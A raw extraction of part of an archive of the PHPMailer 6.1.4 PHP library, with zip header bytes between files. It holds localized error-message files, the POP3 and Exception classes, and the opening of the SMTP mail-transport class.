データが受け付けられませんでした。'; //$PHPMAILER_LANG['empty_message'] = 'Message body empty'; $PHPMAILER_LANG['encoding'] = '不明なエンコーディング: '; $PHPMAILER_LANG['execute'] = '実行できませんでした: '; $PHPMAILER_LANG['file_access'] = 'ファイルにアクセスできません: '; $PHPMAILER_LANG['file_open'] = 'ファイルエラー: ファイルを開けません: '; $PHPMAILER_LANG['from_failed'] = 'Fromアドレスを登録する際にエラーが発生しました: '; $PHPMAILER_LANG['instantiate'] = 'メール関数が正常に動作しませんでした。'; //$PHPMAILER_LANG['invalid_address'] = 'Invalid address: '; $PHPMAILER_LANG['provide_address'] = '少なくとも1つメールアドレスを 指定する必要があります。'; $PHPMAILER_LANG['mailer_not_supported'] = ' メーラーがサポートされていません。'; $PHPMAILER_LANG['recipients_failed'] = 'SMTPエラー: 次の受信者アドレスに 間違いがあります: '; //$PHPMAILER_LANG['signing'] = 'Signing Error: '; //$PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() failed.'; //$PHPMAILER_LANG['smtp_error'] = 'SMTP server error: '; //$PHPMAILER_LANG['variable_set'] = 'Cannot set or reset variable: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PK@fZG2phpmailer/phpmailer/language/phpmailer.lang-gl.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'Erro SMTP: Non puido ser autentificado.'; $PHPMAILER_LANG['connect_host'] = 'Erro SMTP: Non puido conectar co servidor SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'Erro SMTP: Datos non aceptados.'; $PHPMAILER_LANG['empty_message'] = 'Corpo da mensaxe vacía'; $PHPMAILER_LANG['encoding'] = 'Codificación descoñecida: '; $PHPMAILER_LANG['execute'] = 'Non puido ser executado: '; $PHPMAILER_LANG['file_access'] = 'Nob puido acceder ó arquivo: '; $PHPMAILER_LANG['file_open'] = 'Erro de Arquivo: No puido abrir o arquivo: '; $PHPMAILER_LANG['from_failed'] = 'A(s) seguinte(s) dirección(s) de remitente(s) deron erro: '; $PHPMAILER_LANG['instantiate'] = 'Non puido crear unha instancia da función Mail.'; $PHPMAILER_LANG['invalid_address'] = 'Non puido envia-lo correo: dirección de email inválida: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer non está soportado.'; $PHPMAILER_LANG['provide_address'] = 'Debe engadir polo menos unha dirección de email coma destino.'; $PHPMAILER_LANG['recipients_failed'] = 'Erro SMTP: Os seguintes destinos fallaron: '; $PHPMAILER_LANG['signing'] = 'Erro ó firmar: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() fallou.'; $PHPMAILER_LANG['smtp_error'] = 'Erro do servidor SMTP: '; $PHPMAILER_LANG['variable_set'] = 'Non puidemos axustar ou reaxustar a variábel: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PK@fZ9G2phpmailer/phpmailer/language/phpmailer.lang-ko.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'SMTP 오류: 인증할 수 없습니다.'; $PHPMAILER_LANG['connect_host'] = 'SMTP 오류: SMTP 호스트에 접속할 수 없습니다.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP 오류: 데이터가 받아들여지지 않았습니다.'; $PHPMAILER_LANG['empty_message'] = '메세지 내용이 없습니다'; $PHPMAILER_LANG['encoding'] = '알 수 없는 인코딩: '; $PHPMAILER_LANG['execute'] = '실행 불가: '; $PHPMAILER_LANG['file_access'] = '파일 접근 불가: '; $PHPMAILER_LANG['file_open'] = '파일 오류: 파일을 열 수 없습니다: '; $PHPMAILER_LANG['from_failed'] = '다음 From 주소에서 오류가 발생했습니다: '; $PHPMAILER_LANG['instantiate'] = 'mail 함수를 인스턴스화할 수 없습니다'; $PHPMAILER_LANG['invalid_address'] = '잘못된 주소: '; $PHPMAILER_LANG['mailer_not_supported'] = ' 메일러는 지원되지 않습니다.'; $PHPMAILER_LANG['provide_address'] = '적어도 한 개 이상의 수신자 메일 주소를 제공해야 합니다.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP 오류: 다음 수신자에서 오류가 발생했습니다: '; $PHPMAILER_LANG['signing'] = '서명 오류: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP 연결을 실패하였습니다.'; $PHPMAILER_LANG['smtp_error'] = 'SMTP 서버 오류: '; $PHPMAILER_LANG['variable_set'] = '변수 설정 및 초기화 불가: '; $PHPMAILER_LANG['extension_missing'] = '확장자 없음: '; PK@fZYcΨ2phpmailer/phpmailer/language/phpmailer.lang-az.phpnu[ * @author Lucas Guimarães * @author Phelipe Alves * @author Fabio Beneditto */ $PHPMAILER_LANG['authenticate'] = 'Erro de SMTP: Não foi possível autenticar.'; $PHPMAILER_LANG['connect_host'] = 'Erro de SMTP: Não foi possível conectar ao servidor SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'Erro de SMTP: Dados rejeitados.'; $PHPMAILER_LANG['empty_message'] = 'Mensagem vazia'; $PHPMAILER_LANG['encoding'] = 'Codificação desconhecida: '; $PHPMAILER_LANG['execute'] = 'Não foi possível executar: '; $PHPMAILER_LANG['file_access'] = 'Não foi possível acessar o arquivo: '; $PHPMAILER_LANG['file_open'] = 'Erro de Arquivo: Não foi possível abrir o arquivo: '; $PHPMAILER_LANG['from_failed'] = 'Os seguintes remetentes falharam: '; $PHPMAILER_LANG['instantiate'] = 'Não foi possível instanciar a função mail.'; $PHPMAILER_LANG['invalid_address'] = 'Endereço de e-mail inválido: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer não é suportado.'; $PHPMAILER_LANG['provide_address'] = 'Você deve informar pelo menos um destinatário.'; $PHPMAILER_LANG['recipients_failed'] = 'Erro de SMTP: Os seguintes destinatários falharam: '; $PHPMAILER_LANG['signing'] = 'Erro de Assinatura: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() falhou.'; $PHPMAILER_LANG['smtp_error'] = 'Erro de servidor SMTP: '; $PHPMAILER_LANG['variable_set'] = 'Não foi possível definir ou redefinir a variável: '; $PHPMAILER_LANG['extension_missing'] = 'Extensão não existe: '; PK@fZk2phpmailer/phpmailer/language/phpmailer.lang-ar.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'خطأ SMTP : لا يمكن تأكيد الهوية.'; $PHPMAILER_LANG['connect_host'] = 'خطأ SMTP: لا يمكن الاتصال بالخادم SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'خطأ SMTP: لم يتم قبول المعلومات .'; $PHPMAILER_LANG['empty_message'] = 'نص الرسالة فارغ'; $PHPMAILER_LANG['encoding'] = 'ترميز غير معروف: '; $PHPMAILER_LANG['execute'] = 'لا يمكن تنفيذ : '; $PHPMAILER_LANG['file_access'] = 'لا يمكن الوصول للملف: '; $PHPMAILER_LANG['file_open'] = 'خطأ في الملف: لا يمكن فتحه: '; $PHPMAILER_LANG['from_failed'] = 'خطأ على مستوى عنوان المرسل : '; $PHPMAILER_LANG['instantiate'] = 'لا يمكن توفير خدمة البريد.'; $PHPMAILER_LANG['invalid_address'] = 'الإرسال غير ممكن لأن عنوان البريد الإلكتروني غير صالح: '; $PHPMAILER_LANG['mailer_not_supported'] = ' برنامج الإرسال غير مدعوم.'; $PHPMAILER_LANG['provide_address'] = 'يجب توفير عنوان البريد الإلكتروني لمستلم واحد على الأقل.'; $PHPMAILER_LANG['recipients_failed'] = 'خطأ SMTP: الأخطاء التالية ' . 'فشل في الارسال لكل من : '; $PHPMAILER_LANG['signing'] = 'خطأ في التوقيع: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() غير ممكن.'; $PHPMAILER_LANG['smtp_error'] = 'خطأ على مستوى الخادم SMTP: '; $PHPMAILER_LANG['variable_set'] = 'لا يمكن تعيين أو إعادة تعيين متغير: '; $PHPMAILER_LANG['extension_missing'] = 'الإضافة غير موجودة: '; PK@fZ_ZZ2phpmailer/phpmailer/language/phpmailer.lang-lt.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'SMTP klaida: autentifikacija nepavyko.'; $PHPMAILER_LANG['connect_host'] = 'SMTP klaida: nepavyksta prisijungti prie SMTP stoties.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP klaida: duomenys nepriimti.'; $PHPMAILER_LANG['empty_message'] = 'Laiško turinys tuščias'; $PHPMAILER_LANG['encoding'] = 'Neatpažinta koduotė: '; $PHPMAILER_LANG['execute'] = 'Nepavyko įvykdyti komandos: '; $PHPMAILER_LANG['file_access'] = 'Byla nepasiekiama: '; $PHPMAILER_LANG['file_open'] = 'Bylos klaida: Nepavyksta atidaryti: '; $PHPMAILER_LANG['from_failed'] = 'Neteisingas siuntėjo adresas: '; $PHPMAILER_LANG['instantiate'] = 'Nepavyko paleisti mail funkcijos.'; $PHPMAILER_LANG['invalid_address'] = 'Neteisingas adresas: '; $PHPMAILER_LANG['mailer_not_supported'] = ' pašto stotis nepalaikoma.'; $PHPMAILER_LANG['provide_address'] = 'Nurodykite bent vieną gavėjo adresą.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP klaida: nepavyko išsiųsti šiems gavėjams: '; $PHPMAILER_LANG['signing'] = 'Prisijungimo klaida: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP susijungimo klaida'; $PHPMAILER_LANG['smtp_error'] = 'SMTP stoties klaida: '; $PHPMAILER_LANG['variable_set'] = 'Nepavyko priskirti reikšmės kintamajam: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PK@fZ'#D2phpmailer/phpmailer/language/phpmailer.lang-sk.phpnu[ * @author Peter Orlický */ $PHPMAILER_LANG['authenticate'] = 'SMTP Error: Chyba autentifikácie.'; $PHPMAILER_LANG['connect_host'] = 'SMTP Error: Nebolo možné nadviazať spojenie so SMTP serverom.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP Error: Dáta neboli prijaté'; $PHPMAILER_LANG['empty_message'] = 'Prázdne telo správy.'; $PHPMAILER_LANG['encoding'] = 'Neznáme kódovanie: '; $PHPMAILER_LANG['execute'] = 'Nedá sa vykonať: '; $PHPMAILER_LANG['file_access'] = 'Súbor nebol nájdený: '; $PHPMAILER_LANG['file_open'] = 'File Error: Súbor sa otvoriť pre čítanie: '; $PHPMAILER_LANG['from_failed'] = 'Následujúca adresa From je nesprávna: '; $PHPMAILER_LANG['instantiate'] = 'Nedá sa vytvoriť inštancia emailovej funkcie.'; $PHPMAILER_LANG['invalid_address'] = 'Neodoslané, emailová adresa je nesprávna: '; $PHPMAILER_LANG['mailer_not_supported'] = ' emailový klient nieje podporovaný.'; $PHPMAILER_LANG['provide_address'] = 'Musíte zadať aspoň jednu emailovú adresu príjemcu.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP Error: Adresy príjemcov niesu správne '; $PHPMAILER_LANG['signing'] = 'Chyba prihlasovania: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() zlyhalo.'; $PHPMAILER_LANG['smtp_error'] = 'SMTP chyba serveru: '; $PHPMAILER_LANG['variable_set'] = 'Nemožno nastaviť alebo resetovať premennú: '; $PHPMAILER_LANG['extension_missing'] = 'Chýba rozšírenie: '; PK@fZul``2phpmailer/phpmailer/language/phpmailer.lang-pt.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'Erro do SMTP: Não foi possível realizar a autenticação.'; $PHPMAILER_LANG['connect_host'] = 'Erro do SMTP: Não foi possível realizar ligação com o servidor SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'Erro do SMTP: Os dados foram rejeitados.'; $PHPMAILER_LANG['empty_message'] = 'A mensagem no e-mail está vazia.'; $PHPMAILER_LANG['encoding'] = 'Codificação desconhecida: '; $PHPMAILER_LANG['execute'] = 'Não foi possível executar: '; $PHPMAILER_LANG['file_access'] = 'Não foi possível aceder o ficheiro: '; $PHPMAILER_LANG['file_open'] = 'Abertura do ficheiro: Não foi possível abrir o ficheiro: '; $PHPMAILER_LANG['from_failed'] = 'Ocorreram falhas nos endereços dos seguintes remententes: '; $PHPMAILER_LANG['instantiate'] = 'Não foi possível iniciar uma instância da função mail.'; $PHPMAILER_LANG['invalid_address'] = 'Não foi enviado nenhum e-mail para o endereço de e-mail inválido: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer não é suportado.'; $PHPMAILER_LANG['provide_address'] = 'Tem de fornecer pelo menos um endereço como destinatário do e-mail.'; $PHPMAILER_LANG['recipients_failed'] = 'Erro do SMTP: O endereço do seguinte destinatário falhou: '; $PHPMAILER_LANG['signing'] = 'Erro ao assinar: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() falhou.'; $PHPMAILER_LANG['smtp_error'] = 'Erro de servidor SMTP: '; $PHPMAILER_LANG['variable_set'] = 'Não foi possível definir ou redefinir a variável: '; $PHPMAILER_LANG['extension_missing'] = 'Extensão em falta: '; PK@fZwnn2phpmailer/phpmailer/language/phpmailer.lang-cs.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'SMTP त्रुटि: प्रामाणिकता की जांच नहीं हो सका। '; $PHPMAILER_LANG['connect_host'] = 'SMTP त्रुटि: SMTP सर्वर से कनेक्ट नहीं हो सका। '; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP त्रुटि: डेटा स्वीकार नहीं किया जाता है। '; $PHPMAILER_LANG['empty_message'] = 'संदेश खाली है। '; $PHPMAILER_LANG['encoding'] = 'अज्ञात एन्कोडिंग प्रकार। '; $PHPMAILER_LANG['execute'] = 'आदेश को निष्पादित करने में विफल। '; $PHPMAILER_LANG['file_access'] = 'फ़ाइल उपलब्ध नहीं है। '; $PHPMAILER_LANG['file_open'] = 'फ़ाइल त्रुटि: फाइल को खोला नहीं जा सका। '; $PHPMAILER_LANG['from_failed'] = 'प्रेषक का पता गलत है। '; $PHPMAILER_LANG['instantiate'] = 'मेल फ़ंक्शन कॉल नहीं कर सकता है।'; $PHPMAILER_LANG['invalid_address'] = 'पता गलत है। '; $PHPMAILER_LANG['mailer_not_supported'] = 'मेल सर्वर के साथ काम नहीं करता है। '; $PHPMAILER_LANG['provide_address'] = 'आपको कम से कम एक प्राप्तकर्ता का ई-मेल पता प्रदान करना होगा।'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP त्रुटि: निम्न प्राप्तकर्ताओं को पते भेजने में विफल। '; $PHPMAILER_LANG['signing'] = 'साइनअप त्रुटि:। '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP का connect () फ़ंक्शन विफल हुआ। '; $PHPMAILER_LANG['smtp_error'] = 'SMTP सर्वर त्रुटि। '; $PHPMAILER_LANG['variable_set'] = 'चर को बना या संशोधित नहीं किया जा सकता। '; $PHPMAILER_LANG['extension_missing'] = 'एक्सटेन्षन गायब है: '; PK@fZ~2phpmailer/phpmailer/language/phpmailer.lang-id.phpnu[ * @author @januridp */ $PHPMAILER_LANG['authenticate'] = 'Kesalahan SMTP: Tidak dapat mengotentikasi.'; $PHPMAILER_LANG['connect_host'] = 'Kesalahan SMTP: Tidak dapat terhubung ke host SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'Kesalahan SMTP: Data tidak diterima.'; $PHPMAILER_LANG['empty_message'] = 'Isi pesan kosong'; $PHPMAILER_LANG['encoding'] = 'Pengkodean karakter tidak dikenali: '; $PHPMAILER_LANG['execute'] = 'Tidak dapat menjalankan proses : '; $PHPMAILER_LANG['file_access'] = 'Tidak dapat mengakses berkas : '; $PHPMAILER_LANG['file_open'] = 'Kesalahan File: Berkas tidak dapat dibuka : '; $PHPMAILER_LANG['from_failed'] = 'Alamat pengirim berikut mengakibatkan kesalahan : '; $PHPMAILER_LANG['instantiate'] = 'Tidak dapat menginisialisasi fungsi surel'; $PHPMAILER_LANG['invalid_address'] = 'Gagal terkirim, alamat surel tidak benar : '; $PHPMAILER_LANG['provide_address'] = 'Harus disediakan minimal satu alamat tujuan'; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer tidak didukung'; $PHPMAILER_LANG['recipients_failed'] = 'Kesalahan SMTP: Alamat tujuan berikut menghasilkan kesalahan : '; $PHPMAILER_LANG['signing'] = 'Kesalahan dalam tanda tangan : '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() gagal.'; $PHPMAILER_LANG['smtp_error'] = 'Kesalahan pada pelayan SMTP : '; $PHPMAILER_LANG['variable_set'] = 'Tidak dapat mengatur atau mengatur ulang variable : '; $PHPMAILER_LANG['extension_missing'] = 'Ekstensi hilang: '; PK@fZX2++ phpmailer/phpmailer/src/POP3.phpnu[ * @author Jim Jagielski (jimjag) * @author Andy Prevost (codeworxtech) * @author Brent R. Matzelle (original founder) * @copyright 2012 - 2019 Marcus Bointon * @copyright 2010 - 2012 Jim Jagielski * @copyright 2004 - 2009 Andy Prevost * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License * @note This program is distributed in the hope that it will be useful - WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. */ namespace PHPMailer\PHPMailer; /** * PHPMailer POP-Before-SMTP Authentication Class. * Specifically for PHPMailer to use for RFC1939 POP-before-SMTP authentication. * 1) This class does not support APOP authentication. * 2) Opening and closing lots of POP3 connections can be quite slow. If you need * to send a batch of emails then just perform the authentication once at the start, * and then loop through your mail sending script. Providing this process doesn't * take longer than the verification period lasts on your POP3 server, you should be fine. * 3) This is really ancient technology; you should only need to use it to talk to very old systems. * 4) This POP3 class is deliberately lightweight and incomplete, implementing just * enough to do authentication. * If you want a more complete class there are other POP3 classes for PHP available. * * @author Richard Davey (original author) * @author Marcus Bointon (Synchro/coolbru) * @author Jim Jagielski (jimjag) * @author Andy Prevost (codeworxtech) */ class POP3 { /** * The POP3 PHPMailer Version number. * * @var string */ const VERSION = '6.1.4'; /** * Default POP3 port number. * * @var int */ const DEFAULT_PORT = 110; /** * Default timeout in seconds. * * @var int */ const DEFAULT_TIMEOUT = 30; /** * Debug display level. * Options: 0 = no, 1+ = yes. * * @var int */ public $do_debug = 0; /** * POP3 mail server hostname. * * @var string */ public $host; /** * POP3 port number. * * @var int */ public $port; /** * POP3 Timeout Value in seconds. * * @var int */ public $tval; /** * POP3 username. * * @var string */ public $username; /** * POP3 password. * * @var string */ public $password; /** * Resource handle for the POP3 connection socket. * * @var resource */ protected $pop_conn; /** * Are we connected? * * @var bool */ protected $connected = false; /** * Error container. * * @var array */ protected $errors = []; /** * Line break constant. */ const LE = "\r\n"; /** * Simple static wrapper for all-in-one POP before SMTP. * * @param string $host The hostname to connect to * @param int|bool $port The port number to connect to * @param int|bool $timeout The timeout value * @param string $username * @param string $password * @param int $debug_level * * @return bool */ public static function popBeforeSmtp( $host, $port = false, $timeout = false, $username = '', $password = '', $debug_level = 0 ) { $pop = new self(); return $pop->authorise($host, $port, $timeout, $username, $password, $debug_level); } /** * Authenticate with a POP3 server. * A connect, login, disconnect sequence * appropriate for POP-before SMTP authorisation. * * @param string $host The hostname to connect to * @param int|bool $port The port number to connect to * @param int|bool $timeout The timeout value * @param string $username * @param string $password * @param int $debug_level * * @return bool */ public function authorise($host, $port = false, $timeout = false, $username = '', $password = '', $debug_level = 0) { $this->host = $host; // If no port value provided, use default if (false === $port) { $this->port = static::DEFAULT_PORT; } else { $this->port = (int) $port; } // If no timeout value provided, use default if (false === $timeout) { $this->tval = static::DEFAULT_TIMEOUT; } else { $this->tval = (int) $timeout; } $this->do_debug = $debug_level; $this->username = $username; $this->password = $password; // Reset the error log $this->errors = []; // connect $result = $this->connect($this->host, $this->port, $this->tval); if ($result) { $login_result = $this->login($this->username, $this->password); if ($login_result) { $this->disconnect(); return true; } } // We need to disconnect regardless of whether the login succeeded $this->disconnect(); return false; } /** * Connect to a POP3 server. * * @param string $host * @param int|bool $port * @param int $tval * * @return bool */ public function connect($host, $port = false, $tval = 30) { // Are we already connected? if ($this->connected) { return true; } //On Windows this will raise a PHP Warning error if the hostname doesn't exist. //Rather than suppress it with @fsockopen, capture it cleanly instead set_error_handler([$this, 'catchWarning']); if (false === $port) { $port = static::DEFAULT_PORT; } // connect to the POP3 server $this->pop_conn = fsockopen( $host, // POP3 Host $port, // Port # $errno, // Error Number $errstr, // Error Message $tval ); // Timeout (seconds) // Restore the error handler restore_error_handler(); // Did we connect? if (false === $this->pop_conn) { // It would appear not... $this->setError( "Failed to connect to server $host on port $port. errno: $errno; errstr: $errstr" ); return false; } // Increase the stream time-out stream_set_timeout($this->pop_conn, $tval, 0); // Get the POP3 server response $pop3_response = $this->getResponse(); // Check for the +OK if ($this->checkResponse($pop3_response)) { // The connection is established and the POP3 server is talking $this->connected = true; return true; } return false; } /** * Log in to the POP3 server. * Does not support APOP (RFC 2828, 4949). * * @param string $username * @param string $password * * @return bool */ public function login($username = '', $password = '') { if (!$this->connected) { $this->setError('Not connected to POP3 server'); } if (empty($username)) { $username = $this->username; } if (empty($password)) { $password = $this->password; } // Send the Username $this->sendString("USER $username" . static::LE); $pop3_response = $this->getResponse(); if ($this->checkResponse($pop3_response)) { // Send the Password $this->sendString("PASS $password" . static::LE); $pop3_response = $this->getResponse(); if ($this->checkResponse($pop3_response)) { return true; } } return false; } /** * Disconnect from the POP3 server. */ public function disconnect() { $this->sendString('QUIT'); //The QUIT command may cause the daemon to exit, which will kill our connection //So ignore errors here try { @fclose($this->pop_conn); } catch (Exception $e) { //Do nothing } } /** * Get a response from the POP3 server. * * @param int $size The maximum number of bytes to retrieve * * @return string */ protected function getResponse($size = 128) { $response = fgets($this->pop_conn, $size); if ($this->do_debug >= 1) { echo 'Server -> Client: ', $response; } return $response; } /** * Send raw data to the POP3 server. * * @param string $string * * @return int */ protected function sendString($string) { if ($this->pop_conn) { if ($this->do_debug >= 2) { //Show client messages when debug >= 2 echo 'Client -> Server: ', $string; } return fwrite($this->pop_conn, $string, strlen($string)); } return 0; } /** * Checks the POP3 server response. * Looks for for +OK or -ERR. * * @param string $string * * @return bool */ protected function checkResponse($string) { if (strpos($string, '+OK') !== 0) { $this->setError("Server reported an error: $string"); return false; } return true; } /** * Add an error to the internal error store. * Also display debug output if it's enabled. * * @param string $error */ protected function setError($error) { $this->errors[] = $error; if ($this->do_debug >= 1) { echo '
';
            foreach ($this->errors as $e) {
                print_r($e);
            }
            echo '
'; } } /** * Get an array of error messages, if any. * * @return array */ public function getErrors() { return $this->errors; } /** * POP3 connection error handler. * * @param int $errno * @param string $errstr * @param string $errfile * @param int $errline */ protected function catchWarning($errno, $errstr, $errfile, $errline) { $this->setError( 'Connecting to the POP3 server raised a PHP warning:' . "errno: $errno errstr: $errstr; errfile: $errfile; errline: $errline" ); } } PK@fZъv%phpmailer/phpmailer/src/Exception.phpnu[ * @author Jim Jagielski (jimjag) * @author Andy Prevost (codeworxtech) * @author Brent R. Matzelle (original founder) * @copyright 2012 - 2017 Marcus Bointon * @copyright 2010 - 2012 Jim Jagielski * @copyright 2004 - 2009 Andy Prevost * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License * @note This program is distributed in the hope that it will be useful - WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. */ namespace PHPMailer\PHPMailer; /** * PHPMailer exception handler. * * @author Marcus Bointon */ class Exception extends \Exception { /** * Prettify error message output. * * @return string */ public function errorMessage() { return '' . htmlspecialchars($this->getMessage()) . "
\n"; } } PK@fZ!phpmailer/phpmailer/src/index.phpnu[PK@fZңC phpmailer/phpmailer/src/SMTP.phpnu[ * @author Jim Jagielski (jimjag) * @author Andy Prevost (codeworxtech) * @author Brent R. Matzelle (original founder) * @copyright 2012 - 2019 Marcus Bointon * @copyright 2010 - 2012 Jim Jagielski * @copyright 2004 - 2009 Andy Prevost * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License * @note This program is distributed in the hope that it will be useful - WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. */ namespace PHPMailer\PHPMailer; /** * PHPMailer RFC821 SMTP email transport class. * Implements RFC 821 SMTP commands and provides some utility methods for sending mail to an SMTP server. * * @author Chris Ryan * @author Marcus Bointon */ class SMTP { /** * The PHPMailer SMTP version number. * * @var string */ const VERSION = '6.1.4'; /** * SMTP line break constant. * * @var string */ const LE = "\r\n"; /** * The SMTP port to use if one is not specified. * * @var int */ const DEFAULT_PORT = 25; /** * The maximum line length allowed by RFC 5321 section 4.5.3.1.6, * *excluding* a trailing CRLF break. * * @see https://tools.ietf.org/html/rfc5321#section-4.5.3.1.6 * * @var int */ const MAX_LINE_LENGTH = 998; /** * The maximum line length allowed for replies in RFC 5321 section 4.5.3.1.5, * *including* a trailing CRLF line break. * * @see https://tools.ietf.org/html/rfc5321#section-4.5.3.1.5 * * @var int */ const MAX_REPLY_LENGTH = 512; /** * Debug level for no output. * * @var int */ const DEBUG_OFF = 0; /** * Debug level to show client -> server messages. * * @var int */ const DEBUG_CLIENT = 1; /** * Debug level to show client -> server and server -> client messages. * * @var int */ const DEBUG_SERVER = 2; /** * Debug level to show connection status, client -> server and server -> client messages. * * @var int */ const DEBUG_CONNECTION = 3; /** * Debug level to show all messages. * * @var int */ const DEBUG_LOWLEVEL = 4; /** * Debug output level. * Options: * * self::DEBUG_OFF (`0`) No debug output, default * * self::DEBUG_CLIENT (`1`) Client commands * * self::DEBUG_SERVER (`2`) Client commands and server responses * * self::DEBUG_CONNECTION (`3`) As DEBUG_SERVER plus connection status * * self::DEBUG_LOWLEVEL (`4`) Low-level data output, all messages. * * @var int */ public $do_debug = self::DEBUG_OFF; /** * How to handle debug output. * Options: * * `echo` Output plain-text as-is, appropriate for CLI * * `html` Output escaped, line breaks converted to `
`, appropriate for browser output * * `error_log` Output to error log as configured in php.ini * Alternatively, you can provide a callable expecting two params: a message string and the debug level: * * ```php * $smtp->Debugoutput = function($str, $level) {echo "debug level $level; message: $str";}; * ``` * * Alternatively, you can pass in an instance of a PSR-3 compatible logger, though only `debug` * level output is used: * * ```php * $mail->Debugoutput = new myPsr3Logger; * ``` * * @var string|callable|\Psr\Log\LoggerInterface */ public $Debugoutput = 'echo'; /** * Whether to use VERP. * * @see http://en.wikipedia.org/wiki/Variable_envelope_return_path * @see http://www.postfix.org/VERP_README.html Info on VERP * * @var bool */ public $do_verp = false; /** * The timeout value for connection, in seconds. * Default of 5 minutes (300sec) is from RFC2821 section 4.5.3.2. * This needs to be quite high to function correctly with hosts using greetdelay as an anti-spam measure. * * @see http://tools.ietf.org/html/rfc2821#section-4.5.3.2 * * @var int */ public $Timeout = 300; /** * How long to wait for commands to complete, in seconds. * Default of 5 minutes (300sec) is from RFC2821 section 4.5.3.2. * * @var int */ public $Timelimit = 300; /** * Patterns to extract an SMTP transaction id from reply to a DATA command. * The first capture group in each regex will be used as the ID. * MS ESMTP returns the message ID, which may not be correct for internal tracking. * * @var string[] */ protected $smtp_transaction_id_patterns = [ 'exim' => '/[\d]{3} OK id=(.*)/', 'sendmail' => '/[\d]{3} 2.0.0 (.*) Message/', 'postfix' => '/[\d]{3} 2.0.0 Ok: queued as (.*)/', 'Microsoft_ESMTP' => '/[0-9]{3} 2.[\d].0 (.*)@(?:.*) Queued mail for delivery/', 'Amazon_SES' => '/[\d]{3} Ok (.*)/', 'SendGrid' => '/[\d]{3} Ok: queued as (.*)/', 'CampaignMonitor' => '/[\d]{3} 2.0.0 OK:([a-zA-Z\d]{48})/', ]; /** * The last transaction ID issued in response to a DATA command, * if one was detected. * * @var string|bool|null */ protected $last_smtp_transaction_id; /** * The socket for the server connection. * * @var ?resource */ protected $smtp_conn; /** * Error information, if any, for the last SMTP command. * * @var array */ protected $error = [ 'error' => '', 'detail' => '', 'smtp_code' => '', 'smtp_code_ex' => '', ]; /** * The reply the server sent to us for HELO. * If null, no HELO string has yet been received. * * @var string|null */ protected $helo_rply; /** * The set of SMTP extensions sent in reply to EHLO command. * Indexes of the array are extension names. * Value at index 'HELO' or 'EHLO' (according to command that was sent) * represents the server name. In case of HELO it is the only element of the array. * Other values can be boolean TRUE or an array containing extension options. * If null, no HELO/EHLO string has yet been received. * * @var array|null */ protected $server_caps; /** * The most recent reply received from the server. * * @var string */ protected $last_reply = ''; /** * Output debugging info via a user-selected method. * * @param string $str Debug string to output * @param int $level The debug level of this message; see DEBUG_* constants * * @see SMTP::$Debugoutput * @see SMTP::$do_debug */ protected function edebug($str, $level = 0) { if ($level > $this->do_debug) { return; } //Is this a PSR-3 logger? if ($this->Debugoutput instanceof \Psr\Log\LoggerInterface) { $this->Debugoutput->debug($str); return; } //Avoid clash with built-in function names if (is_callable($this->Debugoutput) && !in_array($this->Debugoutput, ['error_log', 'html', 'echo'])) { call_user_func($this->Debugoutput, $str, $level); return; } switch ($this->Debugoutput) { case 'error_log': //Don't output, just log error_log($str); break; case 'html': //Cleans up output a bit for a better looking, HTML-safe output echo gmdate('Y-m-d H:i:s'), ' ', htmlentities( preg_replace('/[\r\n]+/', '', $str), ENT_QUOTES, 'UTF-8' ), "
\n"; break; case 'echo': default: //Normalize line breaks $str = preg_replace('/\r\n|\r/m', "\n", $str); echo gmdate('Y-m-d H:i:s'), "\t", //Trim trailing space trim( //Indent for readability, except for trailing break str_replace( "\n", "\n \t ", trim($str) ) ), "\n"; } } /** * Connect to an SMTP server. * * @param string $host SMTP server IP or host name * @param int $port The port number to connect to * @param int $timeout How long to wait for the connection to open * @param array $options An array of options for stream_context_create() * * @return bool */ public function connect($host, $port = null, $timeout = 30, $options = []) { static $streamok; //This is enabled by default since 5.0.0 but some providers disable it //Check this once and cache the result if (null === $streamok) { $streamok = function_exists('stream_socket_client'); } // Clear errors to avoid confusion $this->setError(''); // Make sure we are __not__ connected if ($this->connected()) { // Already connected, 